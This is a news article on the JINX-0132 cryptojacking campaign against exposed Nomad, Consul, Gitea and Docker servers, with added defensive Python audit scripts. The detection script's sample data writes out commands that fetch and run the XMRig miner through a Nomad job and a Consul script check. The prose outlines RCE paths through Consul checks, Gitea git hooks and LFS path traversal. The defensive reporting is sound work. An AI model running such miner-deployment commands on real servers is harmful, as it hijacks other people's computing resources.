A cryptojacking campaign is targeting internet-exposed DevOps servers running Docker, HashiCorp Nomad, HashiCorp Consul and Gitea, the Wiz Threat Research team reported Monday.
The attackers, tracked as JINX-0132, leveraged misconfigurations or vulnerabilities that leave DevOps servers internet-exposed and susceptible to malicious deployment of the open-source XMRig cryptomining software.
The Wiz researchers noted that the attacks leave few unique indicators of compromise (IOCs) to identify the specific threat actor. Rather than downloading any custom malware from an attacker-controlled server, JINX-0132 downloads XMRig directly from its public GitHub repository.
The attacks were also highlighted as the first publicly reported exploitation of HashiCorp Nomad misconfigurations as an attack vector in the wild, according to Wiz.
“[…] certain affected Nomad instances manage hundreds of clients, with combined CPU and RAM resources that would cost tens of thousands of dollars per month. This highlights how even large organizations with substantial budgets can still be vulnerable to basic misconfigurations,” the Wiz researchers wrote.
How attackers can use your DevOps server for cryptomining
JINX-0132 attackers rely on insecure configurations or vulnerable software versions to hijack DevOps web servers and download XMRig to mine Monero.
Notably, HashiCorp Nomad and Consul are not secure by default: their access control list (ACL) systems are disabled unless the operator turns them on, so the user is responsible for configuring each instance to prevent misuse by attackers like JINX-0132.
HashiCorp Nomad is a scheduler and orchestrator that developers use to deploy and manage containers and non-containerized applications. By default, with ACLs disabled, anyone who can reach the Nomad server's HTTP API can submit jobs to be scheduled.
This default configuration was abused by JINX-0132 to create multiple jobs on exposed servers, which downloaded, unpacked and executed the most recent version of XMRig from GitHub. The malicious tasks had seemingly random names, made up of lowercase letters.
The only unique IOCs were a specific task group name and Monero wallet address, which could easily be replaced by the attacker in future campaigns, the researchers noted.
To prevent Nomad attacks, users should follow HashiCorp's security recommendations and turn on security features such as ACLs so that job creation requires an authenticated, authorized token.
Consul, HashiCorp's service networking solution, was abused less directly: JINX-0132 hijacked its service health check feature. A script check runs an operator-supplied command on the agent's host at every check interval, so whoever can register one gets remote code execution (RCE). One caveat: script checks only run if the agent was started with enable_script_checks set to true (or the safer enable_local_script_checks, which ignores script checks registered over the HTTP API and honours only those defined in local configuration files).
With ACLs disabled, which is the default, anyone who can reach the agent's HTTP API can register a health check, including one that carries a malicious shell command, which is what JINX-0132 did in its cryptojacking campaign. As with Nomad, users can prevent this by enabling HashiCorp's security features and ACLs so that only authorized users can register checks.
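To make the Nomad and Consul cases above concrete, here is an added audit script (not Wiz's or HashiCorp's code) that scans Nomad job definitions and Consul check registrations for the pattern the article describes: job, group and task names that look like random lowercase strings, tasks that fetch XMRig from its public GitHub releases, and Consul script checks, which execute a command on the agent host. The input is constructed sample data shaped like the JSON used by Nomad's GET /v1/job/<id> endpoint and Consul's PUT /v1/agent/check/register endpoint; in practice you would pull these from your own cluster. The raw_exec driver, the pool address and the name-randomness heuristic are assumptions, not details reported by Wiz.

```python
import re
from typing import Any, Iterator

# Strong indicator the article supports: XMRig fetched straight from its public GitHub repo.
XMRIG_RE = re.compile(r"xmrig", re.IGNORECASE)


def looks_random(name: str) -> bool:
    """Weak indicator: a name made only of lowercase letters with no word-like structure.
    Heuristic (our assumption, not a Wiz rule): 6+ letters and a run of 4+ consonants."""
    return bool(re.fullmatch(r"[a-z]{6,}", name)) and re.search(r"[^aeiou]{4}", name) is not None


def _strings(obj: Any) -> Iterator[str]:
    """Yield every string nested anywhere in a JSON-like structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)


def audit_nomad_job(job: dict) -> list[str]:
    """Findings for one Nomad job in the shape returned by GET /v1/job/<id>."""
    findings: list[str] = []
    job_id = job.get("ID", "?")
    hits = [s for s in _strings(job) if XMRIG_RE.search(s)]
    if hits:
        findings.append(f"nomad job {job_id}: references XMRig: {hits[0]}")
    groups = job.get("TaskGroups", [])
    names = [job.get("Name", "")]
    names += [g.get("Name", "") for g in groups]
    names += [t.get("Name", "") for g in groups for t in g.get("Tasks", [])]
    if names and all(looks_random(n) for n in names):
        findings.append(f"nomad job {job_id}: job, group and task names all look randomly generated")
    return findings


def audit_consul_check(check: dict) -> list[str]:
    """Findings for one Consul check definition (body of PUT /v1/agent/check/register)."""
    findings: list[str] = []
    name = check.get("Name", "?")
    # "Args" (current) or "Script" (legacy) makes this a script check: the agent runs
    # the command on its own host every Interval, so whoever can register it has RCE.
    command = check.get("Args") or check.get("Script")
    if command:
        text = " ".join(command) if isinstance(command, list) else str(command)
        findings.append(f"consul check {name!r}: script check runs a command on the agent host: {text}")
        if XMRIG_RE.search(text):
            findings.append(f"consul check {name!r}: command references XMRig")
    return findings


def audit(nomad_jobs: list[dict], consul_checks: list[dict]) -> list[str]:
    """Run both audits and return every finding."""
    findings: list[str] = []
    for job in nomad_jobs:
        findings += audit_nomad_job(job)
    for check in consul_checks:
        findings += audit_consul_check(check)
    return findings


# Constructed sample input (not captured from a real incident). The first job mirrors the
# article: random lowercase names, latest XMRig release pulled from GitHub, unpacked and run.
NOMAD_JOBS = [
    {
        "ID": "qzkvhxmplt",
        "Name": "qzkvhxmplt",
        "TaskGroups": [{
            "Name": "bfhgtw",
            "Tasks": [{
                "Name": "xyrpqk",
                "Driver": "raw_exec",  # assumption: the article does not name the driver
                "Config": {"command": "/bin/sh",
                           "args": ["-c", "tar xzf local/xmrig.tar.gz && ./xmrig-*/xmrig -o pool.example:3333"]},
                "Artifacts": [{"GetterSource": "https://github.com/xmrig/xmrig/releases/latest/download/xmrig-linux-static-x64.tar.gz",
                               "RelativeDest": "local/xmrig.tar.gz"}],
            }],
        }],
    },
    {   # An ordinary job that must not be flagged.
        "ID": "web-frontend",
        "Name": "web-frontend",
        "TaskGroups": [{"Name": "web", "Tasks": [{"Name": "nginx", "Driver": "docker", "Config": {"image": "nginx:1.27"}}]}],
    },
]

CONSUL_CHECKS = [
    {   # Script check: Consul runs Args on the agent host every 30s.
        "Name": "sys-update",
        "Args": ["/bin/sh", "-c", "curl -sL https://github.com/xmrig/xmrig/releases/latest/download/xmrig-linux-static-x64.tar.gz | tar xz"],
        "Interval": "30s",
    },
    {   # HTTP check: no command execution, must not be flagged.
        "Name": "api-health",
        "HTTP": "http://127.0.0.1:8080/healthz",
        "Interval": "10s",
    },
]

if __name__ == "__main__":
    for line in audit(NOMAD_JOBS, CONSUL_CHECKS):
        print(line)
```

The random-name test is deliberately reported separately from the XMRig match: Wiz noted that names and wallet addresses are trivially changed between campaigns, so the durable signal is the behaviour (a script check at all, an artifact pulled from a public miner repository), not the strings.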
Gitea, an open-source, self-hosted Git service often used as an alternative to GitHub or GitLab, was also targeted in the campaign, although Wiz could not determine the initial access method. The researchers did highlight several ways these servers can be exploited.
First, attackers can exploit CVE-2020-14144: in Gitea versions 1.1.0 through 1.12.5 the DISABLE_GIT_HOOKS flag defaults to false, so any user with permission to create git hooks can add a post-receive script that runs with the operating system privileges of the Gitea process, Wiz explained.
While CVE-2020-14144 exploitation would require the attacker to already have a certain level of permission, a different flaw in the short-lived 1.4.0 version of Gitea could enable unauthenticated RCE, according to Wiz.
This flaw, fixed in version 1.4.1 and never assigned a CVE, lets an attacker write a Git Large File Storage (LFS) object without authentication and use path traversal to read ../../../custom/conf/app.ini, then use what that file exposes to create an admin session, after which the git hook mechanism provides code execution, the Wiz team explained.
Additionally, if a Gitea instance has INSTALL_LOCK set to false, an attacker who can reach it can re-run the installation wizard to reset credentials and overwrite the configuration. Wiz recommends restricting who can create git hooks, locking the installer, and making sure the vulnerable 1.4.0 release is not in use.
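As an added example (not Gitea's or Wiz's code), the following script checks a Gitea instance's custom/conf/app.ini and version string against the three conditions just described: INSTALL_LOCK not set to true, git hooks enabled (with the CVE-2020-14144 range called out), and the 1.4.0 release. The two app.ini samples are constructed. Where DISABLE_GIT_HOOKS is absent, the script applies the default the article states for 1.1.0 through 1.12.5 and, as an assumption not stated on the page, treats newer versions as disabling hooks by default.

```python
import configparser

# Version facts from the article: hooks enabled by default in 1.1.0 through 1.12.5
# (CVE-2020-14144); unauthenticated RCE in 1.4.0, fixed in 1.4.1, no CVE assigned.
HOOKS_DEFAULT_ON = ((1, 1, 0), (1, 12, 5))
UNAUTH_RCE_VERSION = (1, 4, 0)


def parse_version(version: str) -> tuple[int, ...]:
    """'v1.12.5' or '1.12.5+dev-123-gabc' -> (1, 12, 5)."""
    core = version.lstrip("v").split("+")[0].split("-")[0]
    return tuple(int(part) for part in core.split("."))


def audit_gitea(app_ini: str, version: str) -> list[str]:
    """Findings for a Gitea instance given its app.ini text and its version string."""
    findings: list[str] = []
    ver = parse_version(version)
    in_hook_range = HOOKS_DEFAULT_ON[0] <= ver <= HOOKS_DEFAULT_ON[1]

    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep Gitea's upper-case keys as written
    # Gitea allows keys above the first section header; configparser does not,
    # so the file is read under [DEFAULT].
    cp.read_string("[DEFAULT]\n" + app_ini)
    security = cp["security"] if cp.has_section("security") else None

    # INSTALL_LOCK false or absent: the install wizard is reachable and can be re-run
    # to reset credentials and overwrite the configuration.
    install_lock = security.getboolean("INSTALL_LOCK", fallback=False) if security else False
    if not install_lock:
        findings.append("INSTALL_LOCK is not true: the installation wizard can be re-run")

    # DISABLE_GIT_HOOKS: absent means false inside the article's range; outside it we
    # assume (not stated on the page) that hooks are disabled by default.
    default_disabled = not in_hook_range
    hooks_disabled = (security.getboolean("DISABLE_GIT_HOOKS", fallback=default_disabled)
                      if security else default_disabled)
    if not hooks_disabled:
        msg = "DISABLE_GIT_HOOKS is false: users allowed to create git hooks get code execution as the Gitea OS user"
        if in_hook_range:
            msg += " (CVE-2020-14144 range)"
        findings.append(msg)

    if ver == UNAUTH_RCE_VERSION:
        findings.append("version 1.4.0: unauthenticated LFS path traversal to app.ini leads to an admin session and RCE; fixed in 1.4.1")
    return findings


# Constructed sample configurations.
WEAK_INI = """
APP_NAME = Example Gitea
RUN_USER = git

[security]
INSTALL_LOCK = false
DISABLE_GIT_HOOKS = false
"""

HARDENED_INI = """
APP_NAME = Example Gitea
RUN_USER = git

[security]
INSTALL_LOCK = true
DISABLE_GIT_HOOKS = true
"""

if __name__ == "__main__":
    for version in ("1.4.0", "1.12.5", "1.23.0"):
        print(version, audit_gitea(WEAK_INI, version))
    print("hardened", audit_gitea(HARDENED_INI, "1.23.0"))
```

Run it against the real app.ini (readable only by the Gitea user, which is itself a check worth making) and the output of gitea --version; an empty list for the hardened sample is the target state.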
Lastly, Wiz noted that when the Docker API is exposed to the internet, attackers can run any action available to the root-owned Docker command line interface, including starting containers of their choosing, and so achieve RCE on the host. The Docker daemon listens only on a local Unix socket by default; Wiz cautions against configuration changes, such as binding the daemon to a TCP port without TLS client authentication, that expose the API to attackers.
25% of cloud environments host targeted DevOps tools
The DevOps tools targeted by JINX-0132 were noted by Wiz to be present in a quarter of all cloud environments, with HashiCorp Consul alone running in more than 20% of environments. About 5% of those environments had an instance exposed to the internet, and 30% of the internet-exposed instances were misconfigured.
A Shodan search performed by Wiz of the targeted HashiCorp tools revealed more than 6,700 total instances exposed to the internet, including more than 2,600 in China and more than 850 in the United States.
Misconfigured developer tools are frequently targeted by cryptojackers aiming to leverage enterprises' computing power for profit. For example, misconfigured Docker APIs were targeted in an April 2025 campaign identified by Darktrace and Cado Security Labs, and nine malicious Visual Studio Code extensions were found to facilitate cryptojacking in a campaign identified by ExtensionTotal the same month.
XMRig is frequently misused in these campaigns, with the open-source Monero mining tool being easily accessible and customizable by attackers.